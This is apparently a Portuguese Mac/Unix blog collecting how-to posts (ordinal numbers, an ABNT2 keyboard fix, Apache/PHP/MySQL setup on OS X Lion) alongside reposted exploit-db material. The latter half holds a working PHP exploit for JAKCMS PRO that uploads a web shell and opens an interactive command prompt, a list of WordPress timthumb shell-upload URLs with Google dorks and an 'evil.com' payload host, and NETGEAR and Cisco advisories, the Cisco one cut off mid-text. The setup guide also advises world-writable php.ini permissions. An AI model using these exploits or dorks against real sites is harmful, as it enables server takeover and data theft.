AppUnix Um portal sobre Unix-Like Sem igual

Como escrever números Ordinais no Mac OS X Leopard | Snow Leopard | Lion

26/09/2011 por Shell

Olá galera tudo na paz de DEUS?

Hoje, vai um artigo simples e que com certeza muita gente recém chegada ao fantástico mundo da maçã ainda não conhece…. sentados na cama ontem, minha amada @sabrinacpsantos me solta a seguinte pergunta:

-Douglas como faço pra colocar aquele esquema de “bolinha” e “azinho” aqui no Mac (número ordinais)?

-Vixe amor, eu não sei… vou pesquisar…..

Pesquisei um pouco e me deparei com um material do próprio site da apple americana…. e lá estava ensinando….. vai em imagens um esquema abaixo de como escrever números ordinais no Mac/Hackitnosh …. vou mostrar no teclado apple verdadeiro e no teclado “ABNT2 de PC” vejam na imagens para ficar mais fácil….

Em um teclado Apple Original

Agora em um Hackintosh ou em um Mac Verdadeiro utilizando Teclado de PC (vulgarmente aqui no Brasil teclado ABNT2) faça da seguinte forma

IAhhhhhhhhhhhhhh ….pegadinha do malandro…. é igual moçada…. só que lembre-se que o Alt em teclado não apple ficam do lado Esquerdo da Barra de espaços, enquanto em teclados apple ficam entre as teclas Command e Control.

Espero que seja uma dica útil aos novos marujos do Navio Os X.

Gostou? Comente, complemente e espalhe!

Como resolver problema com layout ABNT2 Hackintosh/Mac OS X Snow Leopard | Lion | Mountain Lion

25/07/2012 por Shell

Olá galera tudo tranqüilo?

Tenho recebido muitos pedidos de ajuda referente ao layout de teclado ABNT2…. Alguns(maioria) instalam e tudo funciona perfeitamente… Grande parte dos usuários desse instalador são usuários Hackintosh…. ou seja há uma variedade imensa de hardware e ainda assim tudo funciona maravilhosamente bem….. Porém existem casos em que o layout não é tão bom/eficiente…

Seu problema acontece devido a seu teclado ter sido reconhecido no Mac OS X Snow Leopard ou Mac OS X Lion como tipo ISO ( que são os tipo de teclados Europeus) e não ANSI (que são os teclado dos Estados Unidos e restante do mundo) Esse layout foi desenvolvido para teclado do tipo ANSI, em hackintoshs, principalmente nos casos em que se usa conexão do tipo PS2 há o problema de na maioria das vezes ser recolhecido como ISO… o que faz com as teclas | (pipe) e “(aspas duplas fiquem invertidas) e algumas vezes também causa uma desconfiguração também da tecla ? (interrogação)…. nesse rápido artigo de hoje vou mostrar como resolver de forma rápida e simples esse probleminha…… Vou mostrar pelo Terminal pois acho mais interessante fazer esse tipo de ajuste pelo Terminal… mas há como facilmente fazer isso via modo gráfico…..

Pelo Terminal:

Vá no Terminal, Ir (Go) Utilitários (Utility)

Na tela seguinte entre em Terminal

Vire root com su – (eu prefiro assim, mas pode utilizar o sudo para ter poder de super usuário somente nesse comando)

Digite o comando como na imagem

rm -rf /Library/Preferences/com.apple.keyboardtype.plist

ou seja… sem nenhuma mensagem, nenhuma pergunta exclua o arquivo com.apple.keyboardtype.plist de /Library/Preferences/ . Lembre-se que se for feito pelo Terminal e como root esse processo será irreversível (pra ser revertido precisaremos um conhecimento bem avançado), certifique-se de estar excluindo exatamente o arquivo mencionado nesse artigo.

Mesmo que seu sistema esteja em Português, pelo Terminal, ainda sim todo esquema de diretórios do sistema estará em Inglês… Agora se você não se sente a vontade para mexer no Terminal, pode ir pelo modo gráfico… Vá no HD onde está instalado seu Mac OS X, em meu caso Mackintosh HD, Entre em Biblioteca ( caso esteja em Português, caso esteja em inglês Library), Preferências (Preferences caso esteja em Inglês) ai é só procurar o arquivo com.apple.keyboardtype.plist, exclua-o…e reinicie seu Mac/Hackitosh….

Vejam que por padrão não aprece a opção Alterar Tipo de Teclado….

Com a dica acima aparecerá a guia Alterar Tipo de Teclado

Basta acessar Alterar Tipo de Teclado e alterar de ISO para ANSI…. através de um asistente que iniciará ao acessar Alterar Tipo de Teclado, outro ponto a salientar é que em alguns casos ao reiniciar o computador, após excluir o arquivo com.apple.keyboardtype.plist, o Hackintsoh reiniciará e o mesmo sozinho já executará um assistente para inserção do tipo de teclado…. vejam…

obs: não precisa apertar nenhuma tecla caso não saiba o que fazer…..

Aparecerá a seguinte tela, apenas clique em Continuar

Verás

Basta escolher ANSI (EUA e outros) e clicar em OK e você já terá resolvido seu problema com nosso querido layout ABNT2.

Caso você tenha sido o contemplado com o lance de o assistente não iniciar sozinho, utilize o seguinte comando:

open /System/Library/CoreServices/KeyboardSetupAssistant.app

ou com sudo caso não esteja no Terminal como root

sudo open /System/Library/CoreServices/KeyboardSetupAssistant.app

Pronto galera, espero ter ajudado a todos os que tiveram “problemas” como nosso PKG do teclado Brasileiro ABNT2….. Lembrando que citei o fato dos teclado com conexão PS2 terem esse problema, não quer dizer que que os famosos USB não o tenham…. mas vale dizer que a dica funciona para ambos os tipos de conexão e teclados…..

Forte abraço amigos….. Fique na paz de DEUS…..

Se você não sabemou se esqueceu do link do nosso instalador para Teclados ABNT2, está aqui um instalador perfeito desenvolvido por mim para melhorar/facilitar sua experiência no mundo Mac OS com Teclado ABNT2.

Download ABNT2

Gostou? Comente, complemente e espalhe!

Como atualizar seu Mac Os X Lion de forma simples

26/09/2011 por little_oak

Bom, pessoALL, estamos colocando esse simples artigo no ar para que possa ajudar pessoas que tem dúvidas/medo de atualizar seu Mac Os X (normalmente isso acontece com quem tem hackintosh).

Esta semana que passou publicamos um artigo sobre a estabilidade pós update do mac os x lion, você pode conferir aqui, o link mostra que não há problemas em atualizar seu hackintosh para 10.7.1 (caso esteja na 10.7.0).

Bom, este artigo vai mostrar como atualizar seu mac de forma MUITO simples.
Vamo que vamo?

Clicando no menu principal (Aquela mação linda que fica no canto esquerdo superior do seu Desktop (Apple chama o trem de mesa, pode? [lol])

Feito isto, clicando em ATUALIZAÇÃO DO SOFTWARE ele vai abrir aquela caixa de diálogo central e irá fazer busca por update.

Lembre-se de estar conectado na internet com o Mac que você quer atualizar.

Assim que terminar a busca por updates a mesma caixa de diálogo vai mostrar o que precisa ser atualizado, veja abaixo:

Nós do AppUnix sempre gostamos de observar DETALHES da update (a Apple não vai roubar seu pc, lol, não precisa olhar), mas, se você for cabreiro pode clicar em detalhes.
No nosso caso só tinha 1 update disponível, a qual marcamos e instalamos numa boa, vejam:

Assim que clicar em Instalar 1 Item (se marcar mais vai ser exibido Instalar X itens). A Aparência da instalação é simples e mostra uma barra de progresso, veja as imagens abaixo:

Agora veremos a conclusão da update, veja abaixo:

Antes de concluirmos nosso arti queremos lhe notificar que algumas updates críticas (de segurança) requerem o reboot da máquina, se for uma tela aparecerá mandando reiniciar o PC, reinicie sem problemas.
Veja bem, se houver erro pós reboot poderá ocorrer a tela abaixo:

Se este tipo de erro ocorrer basta um simples reboot e o sistema de inicialização vai corrigir o erro de permissões/grupos informado acima.

RESSALTAMOS que em caso de ambientes Hackintosh tome muito cuidado com updates de firmware, pois elas podem ferrar seu ambiente e tchau mac :(.

Desejamos-lhes um excelente final de semana.
Se gostar do artigo dê share, recomende, comente…

Abração galera.
Att: Portal AppUNIX

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

26/09/2011 por little_oak

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION (10.7.1), literalmente current (updates mais novas).

Vamos lá:

No outro artigo, para habilitarmos o apache usamos o comando com poder de root (sudo) para ativar o web server, mas agora isto só é permitido sem stress via Preferências do Sistema -> Sharing (compartilhamento) e marcando o Web Server (compartilhamento de arquivos web), lhe mostraremos imagens abaixo:

Clicando em compartilhamento de páginas web

Note acima que clicamos em COMPARTILHAMENTO junto as preferências de sistema e em seguida marcamos o compartilhamento do apache (páginas web). Toda mudança significativa do mac faz controle de permissões (segurança), por isso coloque seu login e senha para autorizar a mudança.

Feito isto teremos de entrar no conf do apache para liberarmos o php5, veja os passos que diremos.

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

As vezes você pode estar se perguntando:

“Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?”
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X LION está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

Temos de focar em um ponto em comum.

Temos um script na pasta de download que abrimos (do MYSQL).
Veja o seguinte, MYSQL.PREFPANE é um script que serve para adicionar o script (ícone) de inicialização do MYSQL dentro das preferências do sistema, por isso DEVEMOS executar ele sim, autorizando-o com a senha do usuário. (sem isso teremos de inicializar na mão com o comando mysqld (VIXE, mac é praticidade RAPÁ!)

Feito isto iremos confirmar se o mysql está rodando com o seguinte comando (dentro do terminal):

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Substitua little_oak por SEU_USUÁRIO.

Isto fará com que você esteja dentro do mysql (Via terminal).

Veja como abrir o terminal:

Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

Quando citamos a parte do mysql, praticamente contorna a viagem de redefinir a senha de root. Se dermos ouvidos ao Mágico de OZ e inventarmos redefinir senhas vamos brincar com isso ó:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysqld –skip-grant-tables –user=root

grant all…

flush privileges e talz, NÃO PRECISA DISSO, o mac entende que você é um cara que é punk no sistema, que só dá sudo quando sabe o que tá fazendo.

Para conferir como alterar a senha de root do mysql basta clicar no nosso artigo de como redefinir a senha de root no mysql dentro do mac os x lion sem complicações.

PONTO EXTRA:

Como a galera está falando muito de MCRYPT no Mac Os X Lion, o path padrão dele é /usr/share/file/magic/mcrypt
, se quiser descomente a linha do mcrypt no php.ini e mande ficha.

Uma coisa massa, se você quer ver a documentação do apache meta bala em http://localhost/manual/, veja a imagem abaixo:

Se você curtiu esse post dê share :P

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

25/09/2011 por little_oak

Bom, pessoal, nós do app gostaríamos de detalhar algo.
NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui.

Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir nosso how to de instalação do apache, php, e mysql no mac os x lion ou instalação do apache, php, e mysql no mac os x snow leopard

) basta fazer o seguinte:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysql –user=little_oak

Pronto, você precisa lembrar que –user=little_oak deve ser susbsituído por –user=usuário_do_SEUMAC

Depois disso trabalhe normalmente.

Perceba uma coisa forte, o MAC OS X não precisa de root para fazer as coisas (dentro do mysql), ele já sabe que você, usando sudo É O CARA, por isso basta rodar este comando no terminal:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Troque o little_oak por seu usuário. Depois disso é só alegria.

Abraços galera e clique em SHARE, please!

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 por little_oak

Sense of Security - Security Advisory - SOS-11-011

Release Date. 20-Sep-2011 Last Update. - Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 (by contacting NETGEAR) CVE reference. Not yet assigned

Details. The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's as customer premises equipment within Australia and abroad. It is a centrally managed ISP solution whereby each ISP's devices run a customised firmware and configuration changes and updates can be pushed out as required.

Basic authentication is used as the primary and only authentication mechanism for the administrator interface on the device. The basic authentication can be bypassed by sending a valid POST request to the device without sending any authentication header. The response from the device sends the user to another page that requests basic authentication, however at this point the request has already been processed.

An example of attacks using the basic authentication bypass may include changing the admin password or enabling the remote admin interface (Internet facing).

Additionally, due to the lack of CSRF protection in the web application, the bypass attack can be coupled with CSRF to have a victim enable the remote admin interface to the Internet, where an attacker can then use the bypass attack again across the remote admin interface to reset the admin password and access the device. This attack is possible when targeting a victim that is behind the NETGEAR device on the same segment as the web administrator interface whom has browsed to a malicious site containing the CSRF attack.

NETGEAR was notified of this vulnerability on 22 March 2011, but we never received a response or acknowledgement of the issue or fix. Sense of Security notified local ISP's and it was escalated by a local ISP who worked with NETGEAR to develop and test an update. Sense of Security was never provided an opportunity to validate the fixes in the latest firmware version. Given the severity of the issue it would be prudent for NETGEAR to notify and supply an update to all of its customers.

Proof of Concept. By embedding the below HTML in a website and having a victim browse to the website the remote management interface to the Internet would be enabled. An attacker could then use one of the hardcoded passwords for the device to access it, or use a basic authentication bypass to change the admin password. Alternatively, the attacker could conduct a CSRF attack that implements two POST requests to have the remote admin interface enabled, and the admin password changed.

The example here is a basic proof of concept, more complex examples which include JavaScript redirects to mask the basic authentication pop-up would be more stealthy.


 
 
 

Solution.
 Ask your ISP to obtain the latest firmware from NETGEAR and deploy it
 to your device.
Discovered by.
 Sense of Security Labs.
About us.
 Sense of Security is a leading provider of information
 security and risk management solutions. Our team has expert
 skills in assessment and assurance, strategy and architecture,
 and deployment through to ongoing management. We are
 Australia's premier application penetration testing firm and
 trusted IT security advisor to many of the country's largest
 organisations.
Sense of Security Pty Ltd
 Level 8, 66 King St
 Sydney NSW 2000
 AUSTRALIA
T: +61 (0)2 9290 4444
 F: +61 (0)2 9290 4455
 W: http://www.senseofsecurity.com.au
 E: [email protected]
 Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
 http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17874/

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 por little_oak

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 \n";

print "\nExample....: php $argv[0] localhost /";

print "\nExample....: php $argv[0] localhost /jakcms/\n";

die();

}

$host = $argv[1];

$path = $argv[2];

$packet = "GET {$path} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Connection: close\r\n\r\n";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];

$payload = "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";

$payload .= "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";

$payload .= "< ?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";

$payload .= "--o0oOo0o--\r\n";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: PHPSESSID={$sid}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

while(1)

{

print "\njakcms-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}

?>

Fonte: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 por little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

--- Description --- The following WordPress plugins reuse a vulnerable version of the timthumb.php library.

By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-grid-view-gallery # Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/ # Version: 0.1.1

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/auto-attachments # Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/ # Version: 0.2.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/wp-marketplace # Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/ # Version: 1.1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/dp-thumbnail # Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/vk-gallery # Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/ # Version: 1.1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rekt-slideshow # Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/ # Version: 1.0.5

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

Must first base64 encode the URL.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cac-featured-content # Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/ # Version: 0.8

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rent-a-car # Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/ # Version: 1.0 --- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/lisl-last-image-slider # Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/islidex # Software Link: http://wordpress.org/extend/plugins/islidex/download/ # Version: 2.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/kino-gallery # Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cms-pack # Software Link: http://wordpress.org/extend/plugins/cms-pack/download/ # Version: 1.3

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/a-gallery # Software Link: http://wordpress.org/extend/plugins/a-gallery/download/ # Version: 0.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-list-portfolio-page # Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/ # Version: 0.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/really-easy-slider # Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/ # Version: 0.1

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/verve-meta-boxes # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/ # Version: 1.2.8

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin shell upload vulnerability # Google Dork: inurl:wp-content/plugins/user-avatar # Software Link: http://wordpress.org/extend/plugins/user-avatar/download/ # Version: 1.3.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/extend-wordpress # Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/ # Version: 1.3.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Fonte: http://www.exploit-db.com/exploits/17872/

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 por little_oak

Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011 Last Update. - Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP <= F9.1 Severity Rating. Low - Medium Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service. Solution Status. Vendor patch References. 1. CVE-2011-2544 (CSCtq46488) 2. CVE-2011-2543 (CSCtq46496) 3. CVE-2011-2577 (CSCtq46500) Details. Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input. Examples (MXP): Rebooting the system: The attacker may also choose to change passwords in the system, disable encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496): Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for setting and getting configuration.

